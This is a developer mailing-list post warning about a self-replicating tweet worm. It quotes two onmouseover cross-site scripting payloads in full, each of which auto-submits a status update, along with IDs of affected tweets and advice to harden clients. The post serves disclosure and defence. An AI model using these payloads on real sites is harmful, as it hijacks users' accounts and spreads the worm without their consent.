Hello.

There are some malicious tweets coming through in my timeline. The texts of these tweets are for example:

http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/

or

http://t.co/@"onmouseover="document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();"font-size:500pt;/

(so some kind of self-replicating tweet). IDs of some affected tweets: 25111539789, 25105308878.

I do hope twitter is already aware of this Problem, since the official twitter pages are affected, too... But if your client is affected, you should think about hardening it against this attack (mine was affected too, but luckily I'm the only user of it).


Regards,
Fabian Schlenz

--
Twitter developer documentation and resources: http://dev.twitter.com/doc
API updates via Twitter: http://twitter.com/twitterapi
Issues/Enhancements Tracker: http://code.google.com/p/twitter-api/issues/list
Change your membership to this group: 
http://groups.google.com/group/twitter-development-talk?hl=en

Reply via email to